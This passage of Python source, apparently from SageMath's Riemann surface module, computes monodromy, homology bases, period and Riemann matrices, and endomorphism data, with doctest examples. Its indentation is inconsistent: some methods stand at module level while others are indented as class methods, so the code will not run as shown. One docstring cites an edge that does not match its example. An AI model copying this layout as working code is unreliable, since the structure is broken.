return edgeset
def _edge_permutation(self, edge):
r"""
Compute the permutation of the w-values above a point in the z-plane
when moving along an edge in the Voronoi diagram.
INPUT:
- ``edge`` -- an edge on the Voronoi diagram
OUTPUT:
A permutation corresponding to how the roots interchange when moving
along the edge.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = z^3*w + w^3 + z
sage: S = RiemannSurface(f)
Compute the edge permutation of (1,2) on the Voronoi diagram::
sage: S._edge_permutation((1,2))
(0,2,1)
This indicates that while traversing along the direction of `(5,16)`,
the 2nd and 3rd layers of the Riemann surface are interchanging.
"""
if edge in self.downstairs_edges():
#find all upstairs edges that are lifts of the given downstairs edge
#and store the corresponding indices at start and end that label the
#branches upstairs.
L = [(j0,j1) for ((i0,j0),(i1,j1)) in self.upstairs_edges() if edge==(i0,i1)]
#we should be finding exactly "degree" of these
assert len(L) == self.degree
#and as a corollary of how we construct them, the indices at the start
#should be in order
assert all(a==b[0] for a,b in enumerate(L))
return self._Sn([j1 for j0,j1 in L])
else:
raise ValueError('edge not in Voronoi diagram')
@cached_method
def edge_permutations(self):
r"""
Compute the permutations of branches associated to each edge.
Over the vertices of the Voronoi decomposition around the branch locus,
we label the fibres. By following along an edge, the lifts of the edge
induce a permutation of that labelling.
OUTPUT:
A dictionary with as keys the edges of the Voronoi decomposition and as
values the corresponding permutations.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<z,w> = QQ[]
sage: f = w^2 + z^2+1
sage: S = RiemannSurface(f)
sage: S.edge_permutations()
{(0, 2): (),
(0, 4): (),
(1, 2): (),
(1, 3): (0,1),
(1, 6): (),
(2, 0): (),
(2, 1): (),
(2, 5): (0,1),
(3, 1): (0,1),
(3, 4): (),
(4, 0): (),
(4, 3): (),
(5, 2): (0,1),
(5, 7): (),
(6, 1): (),
(6, 7): (),
(7, 5): (),
(7, 6): ()}
"""
D=dict( (e,self._edge_permutation(e)) for e in self.downstairs_edges())
for e in list(D.keys()):
D[(e[1],e[0])]=D[e]**(-1)
return D
    @cached_method
    def monodromy_group(self):
        r"""
        Compute local monodromy generators of the Riemann surface.
        For each branch point, the local monodromy is encoded by a permutation.
        The permutations returned correspond to positively oriented loops around
        each branch point, with a fixed base point. This means the generators
        are properly conjugated to ensure that together they generate the global
        monodromy. The list has an entry for every finite point stored in
        ``self.branch_locus``, plus an entry for the ramification above infinity.
        OUTPUT:
        A list of permutations, encoding the local monodromy at each branch
        point.
        EXAMPLES::
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: R.<z, w> = QQ[]
            sage: f = z^3*w + w^3 + z
            sage: S = RiemannSurface(f)
            sage: G = S.monodromy_group(); G
            [(0,1,2), (0,1), (0,2), (1,2), (1,2), (1,2), (0,1), (0,2), (0,2)]
        The permutations give the local monodromy generators for the branch
        points::
            sage: list(zip(S.branch_locus + [unsigned_infinity], G)) #abs tol 0.0000001
            [(0.000000000000000, (0,1,2)),
             (-1.31362670141929, (0,1)),
             (-0.819032851784253 - 1.02703471138023*I, (0,2)),
             (-0.819032851784253 + 1.02703471138023*I, (1,2)),
             (0.292309440469772 - 1.28069133740100*I, (1,2)),
             (0.292309440469772 + 1.28069133740100*I, (1,2)),
             (1.18353676202412 - 0.569961265016465*I, (0,1)),
             (1.18353676202412 + 0.569961265016465*I, (0,2)),
             (Infinity, (0,2))]
        We can check the ramification by looking at the cycle lengths and verify
        it agrees with the Riemann-Hurwitz formula::
            sage: 2*S.genus-2 == -2*S.degree + sum(e-1 for g in G for e in g.cycle_type())
            True
        """
        n = len(self.branch_locus)
        G = Graph(self.downstairs_edges())
        #we get all the regions (copied, since we modify the loops in place)
        loops = [self.voronoi_diagram.regions[i][:] for i in self.voronoi_diagram.point_region]
        #and construct their Voronoi centers as complex numbers
        centers = self.branch_locus + [self._CC(x,y) for x,y in self.voronoi_diagram.points[n:]]
        for center, loop in zip(centers,loops):
            if -1 in loop:
                #for loops involving infinity we take the finite part of the path
                # (scipy marks the vertex at infinity with index -1)
                i = loop.index(-1)
                loop[:] = loop[i+1:]+loop[:i]
            else:
                #and for finite ones we close the paths
                loop.append(loop[0])
            #we make sure the loops are positively oriented wrt. their center
            # (determinant of the first two edge vectors gives the orientation)
            v0 = self._vertices[loop[0]]
            v1 = self._vertices[loop[1]]
            M = Matrix([list(v0-center),list(v1-center)])
            if M.det() < 0:
                loop.reverse()
        #we stitch together the paths that are part of loops through
        #infinity. There should be a unique way of doing so.
        inf_loops = loops[n:]
        inf_path = inf_loops.pop()
        while (inf_loops):
            inf_path += (inf_loops.pop())[1:]
        assert inf_path[0] == inf_path[-1]
        # Replace the ghost-point loops by the single stitched loop at infinity.
        loops = loops[:n]
        loops.append(inf_path)
        # Base point for all generators: the first vertex of the first loop.
        P0 = loops[0][0]
        monodromy_gens = []
        edge_perms = self.edge_permutations()
        SG = self._Sn
        for c in loops:
            # Conjugate each local loop by a shortest path from the base point,
            # so all generators share the same base point.
            to_loop = G.shortest_path(P0, c[0])
            to_loop_perm = SG.prod(edge_perms[(to_loop[i], to_loop[i + 1])]
                                   for i in range(len(to_loop) - 1))
            c_perm = SG.prod(edge_perms[(c[i], c[i + 1])]
                             for i in range(len(c) - 1))
            monodromy_gens.append(to_loop_perm * c_perm * ~to_loop_perm)
        return monodromy_gens
    @cached_method
    def homology_basis(self):
        r"""
        Compute the homology basis of the Riemann surface.
        OUTPUT:
        A list of paths `L = [P_1, \dots, P_n]`. Each path `P_i` is of the form
        `(k, [p_1 ... p_m, p_1])`, where `k` is the number of times to traverse
        the path (if negative, to traverse it backwards), and the `p_i` are
        vertices of the upstairs graph.
        EXAMPLES:
        In this example, there are two paths that form the homology basis::
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: R.<z,w> = QQ[]
            sage: g = w^2 - z^4 + 1
            sage: S = RiemannSurface(g)
            sage: S.homology_basis() #random
            [[(1, [(3, 1), (5, 0), (9, 0), (10, 0), (2, 0), (4, 0),
                (7, 1), (10, 1), (3, 1)])],
             [(1, [(8, 0), (6, 0), (7, 0), (10, 0), (2, 0), (4, 0),
                (7, 1), (10, 1), (9, 1), (8, 0)])]]
        In order to check that the answer returned above is reasonable, we
        test some basic properties. We express the faces of the downstairs graph
        as ZZ-linear combinations of the edges and check that the projection
        of the homology basis upstairs projects down to independent linear
        combinations of an even number of faces::
            sage: dg = S.downstairs_graph()
            sage: edges = dg.edges()
            sage: E = ZZ^len(edges)
            sage: edge_to_E = { e[:2]: E.gen(i) for i,e in enumerate(edges)}
            sage: edge_to_E.update({ (e[1],e[0]): -E.gen(i) for i,e in enumerate(edges)})
            sage: face_span = E.submodule([sum(edge_to_E[e] for e in f) for f in dg.faces()])
            sage: def path_to_E(path):
            ....:     k,P = path
            ....:     return k*sum(edge_to_E[(P[i][0],P[i+1][0])] for i in range(len(P)-1))
            sage: hom_basis = [sum(path_to_E(p) for p in loop) for loop in S.homology_basis()]
            sage: face_span.submodule(hom_basis).rank()
            2
            sage: [sum(face_span.coordinate_vector(b))%2 for b in hom_basis]
            [0, 0]
        """
        # A genus-zero surface has trivial first homology.
        if self.genus == 0:
            return []
        edgesu = self.upstairs_edges()
        cycles = Graph(edgesu).cycle_basis()
        # Computing the Gram matrix.
        cn = len(cycles)
        # Forming a list of lists of zeroes. Later this will be converted into a
        # matrix.
        intersectionprod = [[0 for c in cycles] for c in cycles]
        #as it turns out, in extreme examples argument computation can be quite dominant
        #so we cache this (since we may end up using these values multiple times)
        direction_cache = {}
        def direction(center,neighbour):
            # Angle of the downstairs edge center -> neighbour, memoized.
            k=(center,neighbour)
            if k not in direction_cache:
                theta=(self._vertices[neighbour]-self._vertices[center]).argument()
                direction_cache[k]=theta
                return theta
            else:
                return direction_cache[k]
        # This loop will start at the entry (0,1), and proceed along the row up
        # til (0,cn-1).
        # Then it will go to entry (1,2), and proceed along the row, etc.
        for i in range(1,cn):
            for j in range(i):
                # Initializing the intersection product value.
                intsum = 0
                # Intersection of the edges
                intsec = set(cycles[i]).intersection(set(cycles[j]))
                for v in intsec:
                    # Get indices of the vertex in the cycles.
                    i0 = cycles[i].index(v)
                    i1 = cycles[j].index(v)
                    # Get the complex value of the vertex v.
                    center = cycles[i][i0][0]
                    # We are in the following situation:
                    # We have two paths a_in->v->a_out and
                    # b_in->v->b_out intersecting. We say they
                    # are "positively oriented" if the a-path
                    # and the b-path are oriented as the x and y axes, i.e.,
                    # if, when we walk around v in counter-clockwise direction,
                    # we encounter a_in,b_in,a_out,b_out.
                    # we can also have that b_in and/or b_out overlaps with
                    # a_in and/or a_out. If we just score the orientation of
                    # b_in and b_out individually, we can deal with this
                    # by just ignoring the overlapping vertex. The "half"
                    # score will be appropriately complemented at one of the
                    # next vertices.
                    a_in=cycles[i][i0-1][0]
                    a_out=cycles[i][(i0+1)%len(cycles[i])][0]
                    b_in=cycles[j][i1-1][0]
                    b_out=cycles[j][(i1+1)%len(cycles[j])][0]
                    # we can get the angles (and hence the rotation order)
                    # by taking the arguments of the differences.
                    a_in_arg=direction(center,a_in)
                    a_out_arg=direction(center,a_out)
                    b_in_arg=direction(center,b_in)
                    b_out_arg=direction(center,b_out)
                    # we make sure to test overlap on the indices, so no rounding
                    # problems occur with that.
                    if (b_in != a_in) and (b_in != a_out):
                        # Each branch is one of the three cyclic rotations of
                        # the same counter-clockwise ordering of the angles.
                        if ((a_in_arg<b_in_arg<a_out_arg) or
                                (b_in_arg<a_out_arg<a_in_arg) or
                                (a_out_arg<a_in_arg<b_in_arg)):
                            intsum += 1
                        elif ((a_out_arg<b_in_arg<a_in_arg) or
                                (b_in_arg<a_in_arg<a_out_arg) or
                                (a_in_arg<a_out_arg<b_in_arg)):
                            intsum -= 1
                        else:
                            raise RuntimeError("impossible edge orientation")
                    if (b_out != a_in) and (b_out != a_out):
                        if ((a_in_arg<b_out_arg<a_out_arg) or
                                (b_out_arg<a_out_arg<a_in_arg) or
                                (a_out_arg<a_in_arg<b_out_arg)):
                            intsum -= 1
                        elif ((a_out_arg<b_out_arg<a_in_arg) or
                                (b_out_arg<a_in_arg<a_out_arg) or
                                (a_in_arg<a_out_arg<b_out_arg)):
                            intsum += 1
                        else:
                            raise RuntimeError("impossible edge orientation")
                # Each crossing was scored twice (once for b_in, once for
                # b_out), so the total must be even.
                assert (intsum%2) == 0
                intsum = intsum//2
                intersectionprod[i][j] = intsum
                # Skew Symmetry
                intersectionprod[j][i] = -intsum
        Gmatrix = Matrix(intersectionprod)
        # Bring the intersection pairing into standard symplectic form; P is
        # the change-of-basis matrix expressing the a/b-cycles in terms of the
        # graph cycle basis.
        G_normalized,P = Gmatrix.symplectic_form()
        if G_normalized.rank() != 2*self.genus:
            raise RuntimeError("rank of homology pairing mismatches twice stored genus")
        # Define the cycle sets.
        acycles = [[] for i in range(self.genus)]
        bcycles = [[] for i in range(self.genus)]
        # There are g a and b cycles.
        for i in range(self.genus):
            # Range over the size of the Gram matrix.
            for j in range(cn):
                # Forms the acycles and bcycles. If the entry in the
                # transformation matrix is non-zero, it adds the coefficient at
                # that entry, and the corresponding cycle. (also, forms it
                # into a loop)
                if P[i][j] != 0:
                    acycles[i] += [(P[i][j],[x for x in cycles[j]]+[cycles[j][0]])]
                if P[self.genus + i][j] != 0:
                    bcycles[i] += [(P[self.genus + i][j],[x for x in cycles[j]]+[cycles[j][0]])]
        return acycles + bcycles
    def make_zw_interpolator(self, upstairs_edge):
        r"""
        Given an upstairs edge for which continuation data has been stored,
        return a function that computes `z(t),w(t)` , where `t` in `[0,1]` is a
        parametrization of the edge.
        INPUT:
        - ``upstairs_edge`` -- a pair of integer tuples indicating an edge on
          the upstairs graph of the surface
        OUTPUT:
        A tuple (g, d), where g is the function that computes the interpolation
        along the edge and d is the difference of the z-values of the end and
        start point.
        EXAMPLES::
            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
            sage: R.<z,w> = QQ[]
            sage: f = w^2 - z^4 + 1
            sage: S = RiemannSurface(f)
            sage: _ = S.homology_basis()
            sage: g,d = S.make_zw_interpolator([(0,0),(1,0)]);
            sage: all(f(*g(i*0.1)).abs() < 1e-13for i in range(10))
            True
            sage: abs((g(1)[0]-g(0)[0]) - d) < 1e-13
            True
        """
        # Downstairs edge (pair of Voronoi vertex indices) of the upstairs edge.
        eindex = tuple(u[0] for u in upstairs_edge)
        i0, i1 = eindex
        z_start = self._vertices[i0]
        z_end = self._vertices[i1]
        # Stored continuation data for this edge: list of (T, fibre, epsilon),
        # shared with self._L so refinements below persist across calls.
        currL = self._L[eindex]
        # Which sheet of the fibre this upstairs edge follows.
        windex = upstairs_edge[0][1]
        def w_interpolate(t):
            if t < 0 or t > 1:
                raise ValueError("t outside path range")
            if t == 0:
                return z_start,currL[0][1][windex]
            elif t == 1:
                return z_end,currL[-1][1][windex]
            while True:
                # Locate the stored interval containing t.
                # NOTE(review): bisect compares the float t against the
                # (T, fibre, epsilon) tuples in currL — this relies on mixed
                # comparison semantics; confirm against the Python version
                # this is meant to run on.
                i = bisect(currL,t)
                t1, w1 ,epsilon = currL[i]
                w1 = w1[windex]
                t2, w2, _ = currL[i+1]
                w2 = w2[windex]
                # Linear interpolation as a Newton starting guess at z0.
                z0 = (1-t)*z_start+t*z_end
                w0 = self._CC(((t2-t)*w1+(t-t1)*w2)/(t2-t1))
                try:
                    desired_result = self._newton_iteration(z0,w0,epsilon)
                except ConvergenceError:
                    pass
                else:
                    return z0,desired_result
                #If we did not succeed, we insert a new point in our interpolation list
                tnew=t
                while True:
                    # Bisect towards t1 until continuation from the stored
                    # fibre at t1 converges at tnew.
                    tnew = (t1 + tnew)/2
                    znew = (1-tnew)*self._vertices[i0]+tnew*self._vertices[i1]
                    try:
                        neww1 = self._determine_new_w(znew,currL[i][1],epsilon)
                    except ConvergenceError:
                        pass
                    else:
                        #When *no* ConvergenceError is raised, we have succeeded and we can exit
                        break
                #once the loop has succeeded we insert our new value
                t1 = tnew
                self._L[eindex].insert(i+1,(t1,neww1,epsilon))
        return w_interpolate,(z_end-z_start)
def simple_vector_line_integral(self, upstairs_edge, differentials):
    r"""
    Perfom vectorized integration along a straight path.

    INPUT:

    - ``upstairs_edge`` -- a pair of integer tuples corresponding to an edge
      of the upstairs graph.

    - ``differentials`` -- a list of polynomials; a polynomial `g`
      represents the differential `g(z,w)/(df/dw) dz` where `f(z,w)=0` is
      the equation defining the Riemann surface.

    OUTPUT:

    A complex number, the value of the line integral.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<z,w> = QQ[]
        sage: f = w^2 - z^4 + 1
        sage: S = RiemannSurface(f); S
        Riemann surface defined by polynomial f = -z^4 + w^2 + 1 = 0, with 53 bits of precision

    Since we make use of data from homotopy continuation, we need to compute
    the necessary data::

        sage: M = S.riemann_matrix()
        sage: differentials = S.cohomology_basis()
        sage: S.simple_vector_line_integral([(0,0),(1,0)], differentials) #abs tol 0.00000001
        (1.14590610929717e-16 - 0.352971844594760*I)

    .. NOTE::

        Uses data that "homology_basis" initializes.
    """
    # Parametrize the lift of the edge and record the straight-line
    # displacement in z, which rescales the integral over [0,1].
    interpolator, z_difference = self.make_zw_interpolator(upstairs_edge)
    ambient = VectorSpace(self._CC, self.genus)

    def values_at(t):
        # Evaluate every differential g(z,w)/(df/dw) at the lifted point.
        z, w = interpolator(t)
        denominator = self._fastcall_dfdw(z, w)
        return ambient([g(z, w) / denominator for g in differentials])

    return integrate_vector(values_at, self._prec) * z_difference
def cohomology_basis(self, option=1):
    r"""
    Compute the cohomology basis of this surface.

    INPUT:

    - ``option`` -- Presently, this routine uses Singular's ``adjointIdeal``
      and passes the ``option`` parameter on. Legal values are 1, 2, 3, 4,
      where 1 is the default. See the Singular documentation for the
      meaning. The backend for this function may change, and support for
      this parameter may disappear.

    OUTPUT:

    Returns a list of polynomials `g` representing the holomorphic
    differentials `g/(df/dw) dz`, where `f(z,w)=0` is the equation
    specifying the Riemann surface.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<z,w> = QQ[]
        sage: f = z^3*w + w^3 + z
        sage: S = RiemannSurface(f)
        sage: S.cohomology_basis()
        [1, w, z]
    """
    if self.genus == 0:
        # A genus-0 surface has no holomorphic differentials; return the
        # (empty) basis itself.  The previous code returned
        # ``self._differentials[0]``, which always raised IndexError.
        self._differentials = []
        return self._differentials
    if self._differentials is None:
        # Computes differentials from the adjointIdeal using Singular
        # First we homogenize
        base = self.f.base_ring()
        # It's important we use a degree ordering; see below.
        R = self._R
        k = PolynomialRing(base, names="Z,W,U", order="degrevlex")
        dehom = k.Hom(R)([R.gen(0), R.gen(1), R.one()])
        fnew = self.f(k.gen(0)/k.gen(2), k.gen(1)/k.gen(2)).numerator()
        # We load the relevant functionality into singularlib
        import sage.libs.singular.function_factory
        sage.libs.singular.function_factory.lib("paraplanecurves.lib")
        adjointIdeal = sage.libs.singular.function.singular_function("adjointIdeal")
        libsing_options = sage.libs.singular.option.LibSingularVerboseOptions()
        # We compute the adjoint ideal (note we need to silence "redefine")
        redef_save = libsing_options['redefine']
        try:
            libsing_options['redefine'] = False
            J = adjointIdeal(fnew, option)
        finally:
            # Always restore the global Singular option, even on error.
            libsing_options['redefine'] = redef_save
        # We are interested in the (degree-3) subspace of the adjoint ideal.
        # We compute this by intersecting with (Z,W,U)^(degree-3). Then the
        # lowest degree generators are a basis of the relevant subspace.
        d = fnew.total_degree()
        J2 = k.ideal(J).intersection(k.ideal([k.gen(0), k.gen(1), k.gen(2)])**(d-3))
        generators = [dehom(c) for c in J2.gens() if c.degree() == d-3]
        if len(generators) != self.genus:
            raise ValueError("computed regular differentials do not match stored genus")
        self._differentials = generators
    return self._differentials
def matrix_of_integral_values(self, differentials):
    r"""
    Compute the path integrals of the given differentials along the homology
    basis.

    The returned answer has a row for each differential. If the Riemann
    surface is given by the equation `f(z,w)=0`, then the differentials are
    encoded by polynomials g, signifying the differential `g(z,w)/(df/dw)
    dz`.

    INPUT:

    - ``differentials`` -- a list of polynomials.

    OUTPUT:

    A matrix, one row per differential, containing the values of the path
    integrals along the homology basis of the Riemann surface.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<x,y> = QQ[]
        sage: S = RiemannSurface(x^3 + y^3 + 1)
        sage: B = S.cohomology_basis()
        sage: m = S.matrix_of_integral_values(B)
        sage: parent(m)
        Full MatrixSpace of 1 by 2 dense matrices over Complex Field with 53 bits of precision
        sage: (m[0,0]/m[0,1]).algdep(3).degree() #curve is CM, so the period is quadratic
        2
    """
    cycles = self.homology_basis()
    def normalize_pairs(L):
        r"""
        Returns a list of edges encoded by the path in L.
        The edges are normalized to be in the direction in which
        the homotopy continuation should have been computed along them.
        """
        R=[]
        for i in range(len(L)-1):
            # Orient each edge so the smaller vertex index comes first;
            # continuation data is stored for that orientation only.
            if L[i][0]<L[i+1][0]:
                R.append((L[i],L[i+1]))
            else:
                R.append((L[i+1],L[i]))
        return R
    # Collect the distinct upstairs edges used by any cycle, so each edge
    # is integrated exactly once even when several cycles share it.
    occurring_edges = set()
    occurring_edges.update(*[normalize_pairs(p[1]) for h in cycles for p in h])
    integral_dict=dict()
    for upstairs_edge in occurring_edges:
        integral_dict[upstairs_edge]=self.simple_vector_line_integral(upstairs_edge,differentials)
    rows=[]
    for cycle in cycles:
        V = VectorSpace(self._CC,self.genus).zero()
        for multiplicity,loop in cycle:
            for i in range(len(loop)-1):
                # Re-derive the orientation: a traversal against the stored
                # direction contributes with a negative sign.
                if loop[i][0]<loop[i+1][0]:
                    direction=1
                    upstairs_edge=(loop[i],loop[i+1])
                else:
                    direction=-1
                    upstairs_edge=(loop[i+1],loop[i])
                V+=(multiplicity*direction)*integral_dict[upstairs_edge]
        rows.append(V)
    # Rows were accumulated per cycle; transpose to get one row per
    # differential as documented.
    return Matrix(rows).transpose()
@cached_method
def period_matrix(self):
    r"""
    Compute the period matrix of the surface.

    OUTPUT:

    A matrix of complex values.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<z,w> = QQ[]
        sage: f = z^3*w + w^3 + z
        sage: S = RiemannSurface(f, prec=30)
        sage: M = S.period_matrix()

    The results are highly arbitrary, so it is hard to check if the result
    produced is correct. The closely related ``riemann_matrix`` is somewhat
    easier to test.::

        sage: parent(M)
        Full MatrixSpace of 3 by 6 dense matrices over Complex Field with 30 bits of precision
        sage: M.rank()
        3
    """
    # Wrap the cohomology basis in fast-callable form once: the integrator
    # evaluates the differentials many times along each path.  (The old
    # code bound the raw basis to ``differentials`` and then immediately
    # discarded it, calling ``cohomology_basis`` a second time.)
    differentials = [fast_callable(omega, domain=self._CC)
                     for omega in self.cohomology_basis()]
    return self.matrix_of_integral_values(differentials)
def riemann_matrix(self):
    r"""
    Compute the Riemann matrix.

    OUTPUT:

    A matrix of complex values.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<z,w> = QQ[]
        sage: f = z^3*w + w^3 + z
        sage: S = RiemannSurface(f, prec=60)
        sage: M = S.riemann_matrix()

    The Klein quartic has a Riemann matrix with values is a quadratic
    field::

        sage: x = polygen(QQ)
        sage: K.<a> = NumberField(x^2-x+2)
        sage: all(len(m.algdep(6).roots(K)) > 0 for m in M.list())
        True
    """
    # Normalize the g x 2g period matrix P = (A | B): the Riemann matrix
    # is A^(-1) * B, computed with a numerically stable inverse.
    P = self.period_matrix()
    g = self.genus
    A_part = P[0:g, 0:g]
    B_part = P[0:g, g:2*g]
    return numerical_inverse(A_part) * B_part
def plot_paths(self):
    r"""
    Make a graphical representation of the integration paths.

    Returns a two dimensional plot containing the branch points (in red) and
    the integration paths (obtained from the Voronoi cells of the branch
    points). The integration paths are plotted by plotting the points that
    have been computed for homotopy continuation, so the density gives an
    indication of where numerically sensitive features occur.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<x,y> = QQ[]
        sage: S = RiemannSurface(y^2 - x^3 - x)
        sage: S.plot_paths()
        Graphics object consisting of 2 graphics primitives
    """
    from sage.plot.point import point2d
    # Trigger the computation of the homology basis, so that the
    # continuation data in self._L is present.
    self.homology_basis()
    points = []
    for edge, data in self._L.items():
        start = self._vertices[edge[0]]
        end = self._vertices[edge[1]]
        # Each stored triple begins with the parameter t of the sample
        # point on the straight segment from start to end.
        points.extend((1 - entry[0]) * start + entry[0] * end
                      for entry in data)
    return point2d(points, size=1) + point2d(self.branch_locus, color="red")
def plot_paths3d(self,thickness=0.01):
    r"""
    Return the homology basis as a graph in 3-space.

    The homology basis of the surface is constructed by taking the Voronoi
    cells around the branch points and taking the inverse image of the edges
    on the Riemann surface. If the surface is given by the equation
    `f(z,w)`, the returned object gives the image of this graph in 3-space
    with coordinates `\left(\operatorname{Re}(z), \operatorname{Im}(z),
    \operatorname{Im}(w)\right)`.

    INPUT:

    - ``thickness`` -- (default: 0.01) thickness passed on to ``line3d``
      for the plotted paths.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<x,y> = QQ[]
        sage: S = RiemannSurface(y^2-x^3-x)
        sage: S.plot_paths3d()
        Graphics3d Object
    """
    from sage.plot.graphics import Graphics
    from sage.plot.plot3d.shapes2 import point3d, line3d
    P = Graphics()
    # trigger the computation of the homology basis, so that self._L is present
    self.homology_basis()
    for e in self._L.keys():
        z0 = self._vertices[e[0]]
        z1 = self._vertices[e[1]]
        def path(t):
            # Base point on the straight downstairs segment; returned as a
            # 2-tuple so a w-coordinate can be appended below.
            z = (1-t)*z0+t*z1
            return (z.real_part(),z.imag_part())
        T = self._L[e]
        color = "blue"
        # One lifted curve per sheet: t[1] holds the w-values above t[0].
        for i in range(self.degree):
            P += line3d([path(t[0])+(t[1][i].imag_part(),) for t in T],color=color,thickness=thickness)
    # Mark every lifted vertex (z, w) as a point in 3-space.
    for z,ws in zip(self._vertices,self._wvalues):
        for w in ws:
            P += point3d([z.real_part(),z.imag_part(),w.imag_part()],color="purple", size=20)
    return P
def endomorphism_basis(self, b=None, r=None):
    r"""
    Numerically compute a `\ZZ`-basis for the endomorphism ring.

    Let `\left(I | M \right)` be the normalized period matrix (`M` is the
    `g\times g` :meth:`riemann_matrix`). We consider the system of matrix
    equations `MA + C = (MB + D)M` where `A, B, C, D` are `g\times g`
    integer matrices. We determine small integer (near) solutions using LLL
    reductions. These solutions are returned as `2g \times 2g` integer
    matrices obtained by stacking `\left(D | B\right)` on top of `\left(C |
    A\right)`.

    INPUT:

    - ``b`` -- integer (default provided). The equation coefficients are
      scaled by `2^b` before rounding to integers.

    - ``r`` -- integer (default: ``b/4``). Solutions that have all
      coefficients smaller than `2^r` in absolute value are reported as
      actual solutions.

    OUTPUT:

    A list of `2g \times 2g` integer matrices that, for large enough ``r``
    and ``b-r``, generate the endomorphism ring.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<x,y> = QQ[]
        sage: S = RiemannSurface(x^3 + y^3 + 1)
        sage: B = S.endomorphism_basis(); B #random
        [
        [1 0]  [ 0 -1]
        [0 1], [ 1  1]
        ]
        sage: sorted([b.minpoly().disc() for b in B])
        [-3, 1]
    """
    # An endomorphism is a homomorphism from the Jacobian to itself, so
    # relate the Riemann matrix to itself.
    tau = self.riemann_matrix()
    return integer_matrix_relations(tau, tau, b, r)
def homomorphism_basis(self, other, b=None, r=None):
    r"""
    Numerically compute a `\ZZ`-basis for module of homomorphisms to a given
    complex torus.

    Given another complex torus (given as the analytic Jacobian of a Riemann
    surface), numerically compute a basis for the homomorphism module. The
    answer is returned as a list of 2g x 2g integer matrices T=(D, B; C, A)
    such that if the columns of (I|M1) generate the lattice defining the
    Jacobian of the Riemann surface and the columns of (I|M2) do this for
    the codomain, then approximately we have (I|M2)T=(D+M2C)(I|M1), i.e., up
    to a choice of basis for `\CC^g` as a complex vector space, we realize
    (I|M1) as a sublattice of (I|M2).

    INPUT:

    - ``other`` -- the codomain, another Riemann surface.

    - ``b`` -- integer (default provided). The equation coefficients are
      scaled by `2^b` before rounding to integers.

    - ``r`` -- integer (default: ``b/4``). Solutions that have all
      coefficients smaller than `2^r` in absolute value are reported as
      actual solutions.

    OUTPUT:

    A list of `2g \times 2g` integer matrices that, for large enough ``r``
    and ``b-r``, generate the homomorphism module.

    EXAMPLES::

        sage: S1 = EllipticCurve("11a1").riemann_surface()
        sage: S2 = EllipticCurve("11a3").riemann_surface()
        sage: [m.det() for m in S1.homomorphism_basis(S2)]
        [5]
    """
    tau_domain = self.riemann_matrix()
    tau_codomain = other.riemann_matrix()
    # Note the argument order: relations are sought with the codomain's
    # Riemann matrix first.
    return integer_matrix_relations(tau_codomain, tau_domain, b, r)
def tangent_representation_numerical(self, Rs, other = None):
    r"""
    Compute the numerical tangent representations corresponding to the
    homology representations in ``Rs``.

    The representations on homology ``Rs`` have to be given with respect to
    the symplectic homology basis of the Jacobian of ``self`` and ``other``.
    Such matrices can for example be obtained via
    :meth:`endomorphism_basis`.

    Let `P` and `Q` be the period matrices of ``self`` and ``other``. Then
    for a homology representation `R`, the corresponding tangential
    representation `T` satisfies `T P = Q R`.

    INPUT:

    - ``Rs`` -- a set of matrices on homology to be converted to their
      tangent representations.

    - ``other`` (default: ``self``) -- the codomain, another Riemann
      surface.

    OUTPUT:

    The numerical tangent representations of the matrices in ``Rs``.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: A.<x,y> = QQ[]
        sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
        sage: P = S.period_matrix()
        sage: Rs = S.endomorphism_basis()
        sage: Ts = S.tangent_representation_numerical(Rs)
        sage: all(((T*P - P*R).norm() < 2^(-80)) for [T, R] in zip(Ts, Rs))
        True
    """
    if not other:
        other = self
    g = self.genus
    P = self.period_matrix()
    field = P.base_ring()
    Q = other.period_matrix()
    # Solve T P = Q R column-block-wise: invert the first g columns of
    # P^t once and reuse it for every R.
    first_rows = list(range(g))
    P_block_inverse = numerical_inverse(P.transpose()[first_rows])

    def tangent_of(R):
        rhs = (Q * R).transpose()[first_rows]
        return (P_block_inverse * rhs).transpose().change_ring(field)

    return [tangent_of(R) for R in Rs]
def tangent_representation_algebraic(self, Rs, other=None, epscomp=None):
    r"""
    Compute the algebraic tangent representations corresponding to the
    homology representations in ``Rs``.

    The representations on homology ``Rs`` have to be given with respect to
    the symplectic homology basis of the Jacobian of ``self`` and ``other``.
    Such matrices can for example be obtained via
    :meth:`endomorphism_basis`.

    Let `P` and `Q` be the period matrices of ``self`` and ``other``. Then
    for a homology representation `R`, the corresponding tangential
    representation `T` satisfies `T P = Q R`.

    INPUT:

    - ``Rs`` -- a set of matrices on homology to be converted to their
      tangent representations.

    - ``other`` (default: ``self``) -- the codomain, another Riemann
      surface.

    - ``epscomp`` -- real number (default: ``2^(-prec + 30)``). Used to
      determine whether a complex number is close enough to a root of a
      polynomial.

    OUTPUT:

    The algebraic tangent representations of the matrices in ``Rs``.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: A.<x,y> = QQ[]
        sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
        sage: Rs = S.endomorphism_basis()
        sage: Ts = S.tangent_representation_algebraic(Rs)
        sage: Ts[0].base_ring().maximal_order().discriminant() == 8
        True
    """
    if not epscomp:
